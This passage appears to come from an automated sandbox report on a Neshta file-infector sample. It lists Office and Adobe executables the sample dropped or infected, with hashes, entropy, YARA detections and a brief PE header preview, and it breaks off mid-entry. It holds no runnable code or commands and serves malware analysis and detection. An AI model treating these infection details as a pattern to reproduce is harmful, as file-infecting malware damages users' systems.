                                                                                                                        SHA1:DABA42EFF4B9D3251E409CFD98A2BD3B9A672ED3
                                                                                                                        SHA-256:3478297533C741CBF62D8FA8F2D820089E3777EBFD6DCDAD50F8FBCF93FB6304
                                                                                                                        SHA-512:D0684A20BD7449D97323DBBE93467148F7E63DB79EC1BD3AC2E90D1350148EDF6F31E7BBEE1F32773D169CD04E1D11FEF03AE2E2C5637A89288FFB08C8115DB5
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.46773744909196
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxvuAvYalUpgotzYIlHkHwt7//Qt:sr85CqaBotvHkHwK
                                                                                                                        MD5:F3279F5053B3112B5299C08136AE58E9
                                                                                                                        SHA1:5B4C8EA82DC1E296CB31EC7B439B8B6E52795995
                                                                                                                        SHA-256:1A1E7090747C3F600989939E12DA73BD2E85FFCAD10159E7AC52D374DA11874A
                                                                                                                        SHA-512:86A355429C9358EEC0FE6B95623DC26FE7879684CDDB6AEAE293276FC5D604CC37DE64FC520F0EE749A3F6A15E9D5FB53852F9B444A0B3DE1374077578A99564
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4135504331115705
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCC+MHzv1nArfoWBgJCSTgHyyf:sr85CDuv1nqQ2zSESy
                                                                                                                        MD5:A937F48D8198AB59DF93A63E834C4AAF
                                                                                                                        SHA1:4DA8ED9F7A886A8437562470A199744DF6E88F24
                                                                                                                        SHA-256:CA2CA4A45AB550D894AA4B16919FF38ABB7784E532C327891DF71645AB845C6A
                                                                                                                        SHA-512:490CDFC2D7AAF7142889398D70DE668CCCD8D4A52AF7C5FA9D64540CE2740F09A481293F4DFFED1ECCED9827148313D2296CC9BFC9716A88814544930C9DE551
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.344917752925491
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCDt+pejhS5enb1o24/tmIY514oZFt4s:sr85CDt+pGQ5E1o24VmIYX4oZP4s
                                                                                                                        MD5:EA546BBE947027BA147DE2719F53D051
                                                                                                                        SHA1:38B150F5A8BE8E19B5D1F2824F8EDE784DE2C6E6
                                                                                                                        SHA-256:930F29A1D4152D23CB5F1E60693191F2865F56EA5474BF720BDC286D518CD9C1
                                                                                                                        SHA-512:D456962B5511F76AF309345C22FCB20EDB120CF4EC3388300FEE1864B13859C605C40B6E86357E698DACA5AED60F56B59DFF1655E3059A9065B9550A7A3C9E1E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.464347380493513
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCSGNDd85lS8adLs4XK9OtiRk+7mLpNKahE:sr85C9NDS5lS8D0K8tMk+7ms
                                                                                                                        MD5:072EDD1A5D3A99C26EA9987890989B31
                                                                                                                        SHA1:6ECC5A3EBEB7EC6EEBBEF28CEB67079A92F57107
                                                                                                                        SHA-256:598CA2D9EB855C5D53C9C19374AFFAAE2E4A6A9C9EBF1F46D2B025B5BD8731B4
                                                                                                                        SHA-512:D11D018159148C9926450A3047B207484D1B31B80BB975B435D6E0FEB497F60625450273C1D834FFAD74C7C581A80224898FDCDC41BB9D3BD799E70AE8EF838E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4498443082331764
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCLddbrls2itD1NrBOTe5IfY2X36Be:sr85CjbO1OTqcX36Be
                                                                                                                        MD5:187B658322698CB74D48476EB2ECB171
                                                                                                                        SHA1:3C4371425F833F6C7643E09BEBA5762B67081611
                                                                                                                        SHA-256:7460BB6E5A2E43F3C737730FE5F9FC5E199072C61B870C07FF35207F333EE496
                                                                                                                        SHA-512:3013808486F1445457BC00B919AFDCC46297B3F167A876EE5F028D50456EBE582C05882D99A0E677531C9FD3796F574AD88AB48FBF394A124F425894F841D636
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.336782734218808
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCEbf/h1xmGzUiVZd0p813HmTJhM3:sr85CMfJ1xmzsHmTHM3
                                                                                                                        MD5:A3977FA0A7C20B05EC69FADE4F852D71
                                                                                                                        SHA1:FE2C747F4DA1C5C85C55EB755CA32D59B0B1EC43
                                                                                                                        SHA-256:1F3B9AB4F318C962967E9418DFEEBF251EF610A0ECE5570E166D84B6A730A932
                                                                                                                        SHA-512:CD8082F275380F4CD67BA08904C116E921C428D8D6BD8BF411A93B42CA9276332AB6E7F46EEC05C697662A98CC70841D12AD3EA6A3DE54EB575DE11BF2A0A1B2
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.531432224892055
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCN5Ss6w5T7tIc+9KLSifgpM5:sr85CrSsp+9KSM5
                                                                                                                        MD5:A651847108A83A8B2A3B75A66403B0DC
                                                                                                                        SHA1:EA7CFC3C984B676C322578E80DCD78DDA75E5A2C
                                                                                                                        SHA-256:A1616D454E5EE365285A3E03455CED1FD70D8EEB682D47A8379EB08CF801D325
                                                                                                                        SHA-512:0B97CD6F46A4660C27E99F140D07BA7F0F380E32062D5F9AF550C161E0191332EB27A196C5CAEFEB94A091CF9294FFEE91604D0FEF329260F768D9669591E2CE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.556968630457308
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVFFlJhOo/ovdHk4h6zeXVv:sr85CVFFlJhOoGt66F
                                                                                                                        MD5:FB0697C512E65305CF24EFA18EC58086
                                                                                                                        SHA1:B924F5AFE1A14163E20DB2CDCE980017C1461D1E
                                                                                                                        SHA-256:CCA73F1C0206BBB9D6567616808D4BADAFAB7796ED40FC86097032802F2381D3
                                                                                                                        SHA-512:FA3AD9699129E24AEAC778B38EF1B6CEBA11B226E6636635224FCB9019036D9E11726F11F50A9D1D531A8A6F08B5D3A3B650E7416655113284B63412C01B1F60
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.131108501135707
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJaFFlJhl7XC0dHPgzh263DX:JxqjQ+P04wsmJCVFFlJhlLDHmdzX
                                                                                                                        MD5:2DCEF042EE374AC5BA2307EE6D97FFAE
                                                                                                                        SHA1:3E39AD4F60367BAFB47B3759253064F7BA57A92B
                                                                                                                        SHA-256:C83153D11C1D63FF5C330035DD66A958BF19EC465969D82DE87351A2C5F7A99D
                                                                                                                        SHA-512:9319A16EA4B3D49FC1CFC4FE9E5890E2DDAA3E5D1523A150C77E0201C727EA0580E0B2D79CD4914968305B037B987494D57604E4792790069E992EEEE3D5324B
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.254281392784178
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJrBE27rCNzU3GLCAAhUSCr1HkueFNUx+:JxqjQ+P04wsmJCKEJzbmAoDucEMQnF0
                                                                                                                        MD5:D7BF211CED7D30A27312CE4DA2487EE1
                                                                                                                        SHA1:CE664FBA8F5BEAA728CB7EAE107C5ED3810A5DDF
                                                                                                                        SHA-256:9266432725D9466253A4F1F609C9A2DD85FC82B3A0E3A6C43FCB1A267C976265
                                                                                                                        SHA-512:260EA864A9512B243DD18EC3C4D6CA7782DD3ED117AA553E6C30F3249655EEDB3768AC190432CBA66078F93C83F8B05CAB352B254FB58C3586EF56F2C3482EED
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.369176164130001
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmmgFboVWAfMOD9nwcP4McxAF+V2r9Q:sr85CmhFbG5n7vcxAwVIu
                                                                                                                        MD5:E883EB6C4D29614F1887EDF6A2412659
                                                                                                                        SHA1:33DAF7D41A5C6D4D8AB1C91160F775D9810E10F9
                                                                                                                        SHA-256:BE47F38C1D1A3806AD27867DF41BF62AFB77FADCAD4F00CF3B68FD469E1B2154
                                                                                                                        SHA-512:EF18F22EB51AE378651FD7421E56EC682BE64AED01D79FDC1E3366459690AE52E312B4BE3A70C50653EC98C261EE2557C4B4F908AC8254E47B96F7268847F665
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.694866680260046
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC5wI4PqxgWvwG+TUawK:sr85C5wslwG+TUawK
                                                                                                                        MD5:A851E7A4D035C32FCB2830718B34F01C
                                                                                                                        SHA1:6D89FD230ADE8F14971A600591A8B6FAF67CD770
                                                                                                                        SHA-256:73610C44EE38B1785E018C2BC869052729D56C65545F52EE5D2AB89C8C7B6DCE
                                                                                                                        SHA-512:77726930C4BFE2DF33FCADA1A4A493F8DB8B3A5681C5D79DC51F9625C4110680DFA50C44CA272B71E46175FF56954B1583B9771B73412D25D06954AF8AAF81E8
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.511827025814232
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHz6xccTu/YnwN9+ko47VGsKkfrwayHd+f:sr85CT6yHYn+o4Jrn
                                                                                                                        MD5:2DBF9767B1524319753ADE899740500C
                                                                                                                        SHA1:D684A9E8CC28A5185CF477554DF2065D73126877
                                                                                                                        SHA-256:14143B435D60E49B251E80E37857E98D36088EB0CBE02C4C630F381E37BA8F0B
                                                                                                                        SHA-512:A7B9EA44485796E0AA8C51A2A762EA95640EE34FEA51C3F043A5EC37E99EE95054F610C8FB72C445609F90B6EBFA5590036294B8E4770BD483E8926B38C7BDB3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.361986604416892
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC4QTS8CYtvYSi+GAqeqCifxUajaQ:sr85C42S8/caAUSaQ
                                                                                                                        MD5:8F8291D79A298A9B071864C651BB0794
                                                                                                                        SHA1:F7614B1E0D476F1CBC75B5D698711F9DF460F773
                                                                                                                        SHA-256:E9562B1B83495930753D145E9834CCA9128745E3163C060A4AA3D7DA62AA468F
                                                                                                                        SHA-512:160D10672400D32BB10A059CC2AF3CA79810A9D0FDB88B79F6E0BB208DA26F973965853A429A7D9D4CD30570E015F17EB458DF6C6311BB89394AF46ED8B189E7
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.56237653560924
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/MyzuDxqDq2m1eHwSFdrdAHZY:JxqjQ+P04wsmJCOxzuDxqDsmwSFbuY
                                                                                                                        MD5:2CF8F2ECEB42B70A5493D1EAEAC6B20A
                                                                                                                        SHA1:B411993C6352F4B026153AE4010A6C2D7B1ACE3B
                                                                                                                        SHA-256:A85EB54DE3BE548DBE89BC47098B417F4C1029BA084D0B15F75687D0751EF44E
                                                                                                                        SHA-512:8D2514F16C8D47CE668397B6DEF1A59A4D2C7B7E4A8E7613865C4833BE0B882D87AECB02C049B7496D633CA740DEB33A59DE6D0488F21C26109C89F8C511570D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.388189611386593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/jWSlFQQoUmydAHZk6:JxqjQ+P04wsmJCOjTlWFauk6
                                                                                                                        MD5:62A21A597FA5F5C489D266A87694FE61
                                                                                                                        SHA1:8A9C326ABA5638F6B91BA8DD18D258998CC9D25B
                                                                                                                        SHA-256:D35B0D2411B6D5CDE4F61E5EBD70BBB1644AAE5E95EF417E3E885B20C194DE49
                                                                                                                        SHA-512:F4F9F7C8BDCDC7CAC1D491E528E88464A78F6254F44F2C3758860B495E188B607EA2FB2B292CCD82829F1E462EC07BFDD5F0F1729F7083C9FA398FD7EC133E26
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.131620925268659
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJDK2sNTXC8cEGV6GskwTO:JxqjQ+P04wsmJCOKZxXk6GskwTO
                                                                                                                        MD5:1F414E9B0D1C3584418658367EC9242F
                                                                                                                        SHA1:5D11420BEB0507F3A71925E2A0A2DC36EA1265DF
                                                                                                                        SHA-256:CEB5DB2FF4B04E0C3683D039DB97ACC145C5FB9DD026A7DC9B84F12D424E9488
                                                                                                                        SHA-512:1AE9A3653B774AACEA8A2CD24ED9BAAD8245967E16122F53099A8A640D6BF5C055651C50B5D83C4EBF962060FE021A274EDBFB818093A783884C9AC6DB822D03
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4980851403396676
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHJDYG7YSUhCD8TanIVayX0TfC8cvB11lV:sr85CpDDkSQCfLy0fk11lV
                                                                                                                        MD5:D4811ACDE0C5F48DACC1BBC3E310E8D8
                                                                                                                        SHA1:06F814E81524B40587E503E32B8865D66A8383A6
                                                                                                                        SHA-256:3B5D056392B165F9001BF785E6F91187B75A67F0209E5C189AE0764A66FF3E10
                                                                                                                        SHA-512:6BE82945EAB1E9FD9BA507045B6B45799AFD11F5A3A30949E03FA100F93750DD0ECEBECABDB1883B764C90791ABED09EE191588BB8A8241AC6A6AFAAA120C169
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.57605386644689
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMfSoIt2ZzzV9uc1EshwMDkEcAv4i+:sr85Cnkz//1DgEcAv5+
                                                                                                                        MD5:100E15577B28178663E63AB854D28B4A
                                                                                                                        SHA1:DC7D931ECDA8C09D0D2B43988E6D689A20E080F1
                                                                                                                        SHA-256:238254BCE07446426D478897AC3DE27DE2B9606B2E8477F7DDAF8A20A2999FC4
                                                                                                                        SHA-512:5F5A2C7F553B747A9A1811E9D4D3A0BDA525D5977D5BB709F65164308E020B31A7EC0029C435D8F05E46E737242BB5F934D0094728841F6C545E15C625444C47
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):4.744720269791172
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJozp/q4:JxqjQ+P04wsmJCV/Z
                                                                                                                        MD5:316C81CA54C5FAC241D16CA25E7B341C
                                                                                                                        SHA1:9E1199BCB359EA9146EAD52E765F3913A791CD7A
                                                                                                                        SHA-256:9CE3D752106B78CBB5CF3DF574CD084177C4CF97FF35CC6E983EAD6F4A3F6CE1
                                                                                                                        SHA-512:CEC15054D8351322566F67B46B333F11064CB650D4ADDCDBC9174C66EE4E4D4F1C3400FDE6BBDCD3B632ED051C92E898C5170B1A6504BB11A771230D4EA15D3F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.422024969420582
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjMnNFZnBeGI9cKm8q3+i2PPvfKLD1D9nwt:sr85CMBeLsOBXiN9nwt
                                                                                                                        MD5:62F99051442ED97159B8D9CC03BBF8DC
                                                                                                                        SHA1:E22CF810217DFC5700C2C629162EF37CA672C957
                                                                                                                        SHA-256:C83C04BB7EBAC75F623938C167AD7F09606F2E0B786A1CCAFA12E080F9455E9A
                                                                                                                        SHA-512:FE259BC5D8C12884C403B4F08E00272DEBFEECEDF5F9230F8B0A3B6DE100D58AEC610B849DFFD94568A44389FACAF7B55B1631F9AA51BD91B7C1F3C91408619A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Florian Roth
                                                                                                                        C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.384524945408535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmG2kHtSSHuzUfuNAGt1Uv1JwsxtD:sr85CBNrOEuNAsWJwsD
                                                                                                                        MD5:D0B62E96259230D26E500B5D2F6E2488
                                                                                                                        SHA1:86DA8E18DCCD893874C398FDB41EEE85D766A4EC
                                                                                                                        SHA-256:1E2BC4A5441F740B2E9838EAB3964123A2D358B62E1F124C5F1E8BB4E5AB2319
                                                                                                                        SHA-512:BA4E224F4D5C8A5B5E626A7EEE6F35688528244BD7F9323CF74AF219BFA2AAFBB947DDAFD8ED815F564EDE0403B09CDBB1DEFB0A9CE9753A75C8A1C5E912FAFE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, Author: Florian Roth
                                                                                                                        C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.384524945408535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmG2kHtSSHuzUfuNAGt1Uv1JwsxtD:sr85CBNrOEuNAsWJwsD
                                                                                                                        MD5:D0B62E96259230D26E500B5D2F6E2488
                                                                                                                        SHA1:86DA8E18DCCD893874C398FDB41EEE85D766A4EC
                                                                                                                        SHA-256:1E2BC4A5441F740B2E9838EAB3964123A2D358B62E1F124C5F1E8BB4E5AB2319
                                                                                                                        SHA-512:BA4E224F4D5C8A5B5E626A7EEE6F35688528244BD7F9323CF74AF219BFA2AAFBB947DDAFD8ED815F564EDE0403B09CDBB1DEFB0A9CE9753A75C8A1C5E912FAFE
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.441581793400409
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbqnf2+Q4NIvym8kig4kZ5vHDRKjwX03:JxqjQ+P04wsmJCEq+l428qjRNX4
                                                                                                                        MD5:E9116F5812E84117738237DE522B5445
                                                                                                                        SHA1:367077F61C829CCA2196A1FB3DD837DCB0933BE2
